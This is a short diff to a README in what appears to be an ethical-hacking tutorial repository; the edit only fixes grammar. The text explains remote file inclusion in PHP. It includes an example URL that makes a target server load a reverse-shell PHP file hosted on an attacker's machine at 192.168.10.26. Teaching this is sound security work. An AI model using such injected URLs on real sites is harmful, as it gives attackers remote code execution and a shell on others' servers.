RodgerOliver/ethical-hacking/README.md

 If the server turned on the functions `allow_url_include` and `allow_url_fopen`, the attacker can upload any file from any server to the target.

-For this to work, make a php file that gives you a reverse connection to the target and save it as `.txt`.
-Then put this on you server, copy the link to the file and paste in the string like so `https://website.com/upload/?page=http://192.168.10.26/php-reverse.txt?`
+For this to work, make a php file that gives you a reverse connection to the target and saves it as `.txt`.
+Then put this on your server, copy the link to the file and paste in the string like so `https://website.com/upload/?page=http://192.168.10.26/php-reverse.txt?`

 ### SQL Injection